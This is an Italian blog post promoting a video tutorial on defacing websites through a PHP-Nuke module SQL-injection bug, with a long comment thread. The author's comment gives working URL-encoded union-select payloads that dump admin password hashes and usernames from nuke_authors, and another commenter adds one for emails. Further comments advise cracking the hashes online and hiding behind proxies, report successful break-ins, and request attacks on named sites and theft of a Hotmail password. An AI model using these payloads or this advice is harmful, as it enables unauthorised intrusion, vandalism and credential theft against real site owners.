VIDEO DEFACCIARE UN SITO……

oggi vi spiego cm defacciare un SITO con il bug che si trova:

# modules.php?name=roportaj&op=listarticles&secid=

SCUSATE SE TROVATE QUALCHE ERRORE MENTRE FACCIO LA GUIDA …..è STATA FATTA STAMANE ALLE 6 QUANDO SONO VENUTO DA LAVORO……😀 ….DOWNLOAD VIDEO

46 Risposte to “VIDEO DEFACCIARE UN SITO……”

  1. Ciao complimenti x la guida.. Dove posso trovare gli exploit?

    Puoi postarli?

  2. ago1980 Says:

    exploit passw:
    -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2
    Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2
    Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

    exploit name:
    -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2
    Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A
    %2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

  3. scusa ma nel video si vede ke usi un programma che si kiama rednoiz.pl ma e obbligatorio usarlo o scaricarlo??? scrivimi su msn alex94-msn@hotmail.it
    cmq.. complimenti per la guida!!

  4. nn e obbligatorio usare rednoiz.pl ma puoi andare sul sito http://md5.rednoize.com/ cha fa l ho stesso funzinamento…..ciao

  5. ago nn e ke potresti defacciarmi un sito forum free faro di tt x farlo defacciare ti prego… contattami su msn ke ne parliamo

  6. ah questi manco sanno cm usare il pc lo hanno ftt x il culo il forum.
    cmq se la risposta e si il sito e questo: http://www.clanfire4ever.forumfree.net
    se e si la risposta falli sentire perdenti e scrivici quello che vuoi tipo ago deface qll ke vuoi. sei tu il capo . ti prego

  7. ALLORA?

  8. SCUSA MA IO NN MI METTO A DEFACCIARE FORUM SENZA MOTIVO……..E IN PIU NN L HO FAREI MAI PER Tè PER FARTI UN PIACERE……XD

  9. pendragon Says:

    salve ago1980 ho bisogno che mi contatti urgentemente, ti devo parlare di una cosa seria riguardo al defacciamento di un forum . non posso mettere il link perchè non vorrei che gli utenti leggessero lo schifo che si scrive li sopra. ti prego contattami

  10. GidanTKA Says:

    Ave!
    complimenti per il video

  11. grazie…xd

  12. vorrei imparare come defacciare un blog sul quale sn stato insultato,potresti aiutarmi ago?

  13. si puo’ defacciare un blog? e come fare, esiste un exploit per farlo?
    il blog e’ con dominio myblog.

  14. ciao ago complimenti per la guida!!

    l’altro giorno mi hanno deffacciato un mio forum su forumfree e essendo inesperto volevo chiederti se tu potevi defacciarlo
    ecco il sito http://mastergames.forumcommunity.net/

  15. si puo deffacciare habbo al sito http://www.habbo.it perche i codici riportati nel post del del 6 maggio 2008 da ago 1980 non funzionano

  16. Puo’ essere che la password non è criptata in md5? A me non decripta

  17. Ho provato a farlo sullo stesso sito che hai usato tu nella guida…sono riuscito ad entrare…
    per caso prima dovevo attivare un proxy???

  18. si prima di fare una cosa del genere conviene sempre avere un proxy…

  19. Ciao a tutti, in particolar modo a te, Ago…
    Volevo chiedere dove è possibile trovare del materiale-informativo su come defacciare un sito…
    Grazie in anticipo…

  20. Complimenti x il sito…

  21. nel video e spiegato in modo facile come fare….XD

  22. valerio Says:

    ciao ago, complimenti per il sito……
    una domandina molto semplice per te e difficile per me…. è possibile defacciare facebook? nel caso sia possibile, mi potresti indicare anche l’exploit idoneo? ti ringrazio anticipatamente se vorrai rispondere alla mia mail. Ciao

  23. ago1980 Says:

    XD……..

  24. Dottor Alex Says:

    Ciao senti ho defacciato IO il sito.. e.. sen’è accorto e ha cambiato la password. comunque, ERI PROXATO QUANDO HAI FATTO QUESTO???
    P.S: Esistono altri bug, oltre a “gaestebuch_v22”??? Grazie in anticipo per la risposta

  25. ago1980 Says:

    si.meglio essere sempre PROXATI quando si fanno ste cose……XD

  26. Ago davvero complimenti… l’avevo visto fare in altri modi ma cosi mai…
    ascolta una sola domanda… ma cm faccio a trovare exploit per altri siti qualsiasi??? scusa ma sono nuovo a questi giochi sto imparando da un mio amico e non posso di certo ritenermi un esperto. grazie fammi sapere al più presto… ciao😄

  27. DarkNike00 Says:

    [QUOTE]SCUSA MA IO NN MI METTO A DEFACCIARE FORUM SENZA MOTIVO……..E IN PIU NN L HO FAREI MAI PER Tè PER FARTI UN PIACERE……XD[/QUOTE]

    Parole sante bravissimo tu si che sei un vero hacker no quegli “hacker” che poi alla fine non sono altro che lamer il quale imparano a memoria alcune mosse e si credono dio. Comunque dovrei farti una domanda per te molto semplice credo xD, appena puoi contattami. Grazie.

  28. ago mi faresti il favore di contattarmi…. ho un paio di domande da farti…
    complimenti cmq! te la cavi niente male

  29. come ti fai a proxare???

  30. Gabriele Says:

    Per proxarsi è molto semplice ^^
    Esistono dei programmi,di nome TOR Privoxy e Vidalia,io quando faccio certe cose mi rpoxo sempre,ho un PC che è una bestia

  31. Scusate la domanda ma http://md5.rednoize.com/ nn me lo fa aprire dice che c’è un errore così volevo chiedere se ago potesse postare rednoiz.pl detto questo io vado grazie in anticipo….

  32. isbidorkauen Says:

    ciao ago acolta ho un problema a settare multiproxy nn è che potresti darmi una mano?? il punto in realtà è che nessun server sembra essere disponibile per collegarsi anonimi e non… resta sempre il pallino rosso… la porta 8088 e settata anche nell opzioni del browser, il programma è settato correttamente potresti aiutarmi?? grazie in anticipo per la risposta

  33. ciao a tutti mi serve un bel favore….Mi aiutate a defacciare (se lo fate voi è meglio🙂 ) questo sito http://www.luconileonardo.it ha fatto una cosa grave nei miei confronti se mi potete fare questo piacere ne sono grata mi basta che gli cambiate la home eheh ehe fatemi sapere un bacio a tutti

  34. mandatemi una email

  35. Lorenzo Says:

    ciao scusa lo so questa guida è un pò vecchia ma quando provo ad entrare nel pannello di controllo admin usando il sito del video non mi entra perchè mi dice ” 403 forbidden You don’t have permission to access /modules.php on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    WebServerX Server at http://www.yenisehirayrinti.com Port 80″
    mica è stato fixato il bug?
    se puoi aggiungimi su msn sono lori19841@hotmail.it
    grazie se mi aggiungi che avrei anche qualche altro problema riguardante questo.

  36. Bel video bravo :)! Credi sia possibile defacciare forum in vbulletin? Perfavore rispondimi, io sono ancora un niubbo!

  37. ago io ho trovato un sito in cui nn è stato ancora fixato il bug ma nn riesco a decriptare la password… mi potresti postare un sito da dove scaricare rednoize? oppure spiegami come si usa http://md5.rednoize.com/

  38. ciao, complimenti della guida molto bella e utile. pero io non riesco a fare una cosa decriptare la password. come si fa? oltre a rednoize ci sono altri programmi per favore posteresti un post con uno più link per scaricare un programma che funzioni come rednoize oppure dei siti per decriptare password diverso da md5.rednoize.com o un post che spiega bene il sito perchè non ci ho capito nulla. comunque potrestri postare un guida con tutto insieme cosi da avere tutto sotto mano siti, programmi, link, codici ecc…

  39. cmq in questi siti c’è anche questa terza exploit per mail:

    exploit email : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cemail%2F%2A%2A%

    si risale alla mail c’è un modo per rubare password email per far in modo che recuperi la pass come se l’avesse persa nel mio caso è una mail hotmail di msn.

  40. ciao!, bella guida e molto utile ma non capito una cosa. come faccio a decriptare una password oltre a questo sito: http://md5.rednoize.com/ perchè non sapendo neache come scaricare rednoize non saprei come fare, per favore posti un modo per farlo? comunque perchè non posti appena hai tempo con una guida simile ma completa di link di programmi, link di siti di alternativa ai programmi, e diretti gli exploit o altro per deffaciare i siti, comunque per questi siti vorrei avvisare che c’è un terzo exploit in cui trovi la mail.

    exploit email : -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cemail%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

    comunque per favore se conosci altri siti o altri programmi per decriptare le password le potrersi linkarli.

    io comunque ho trovato un sito con email hotmail a questo punto mi seriberebbe rubare la mail e poi il gioco è fatto se mi diresti per favore come fare cosi rubo tramite email la password del sito?

    in ogni caso mi manca solo pass in chiaro xk email, pass codificata, id li ho trovati tutti. aiuto please!

  41. bella guida.

  42. cmq se mi contatti è meglio msn: grisuciao@hotmail.it

  43. ciao a proposito di tutti i miei commenti il problema/ problemi sono stati risolti.

  44. scusate ma ho una domanda come si fa ad avere rednoize sn un ragazzo di 12 anni e mi complimento per il video con cui mi sono trovato meglio che degli altri siti
    aspetto vostre risposte

  45. ciao ago sei molto bravo complimenti ! potresti dirmi in che metodo di criptazione sono queste password ???
    oppure potresti darmi il link per scaricare il programma che usi ???
    md5oogle non trova la password che sono riuscito a porovare
    inoltre vorrei consigliarti se è possibbile mettere delle video guide dove spieghi a defacciare siti in php asp o altro grazie ciaoo😀

Lascia un commento

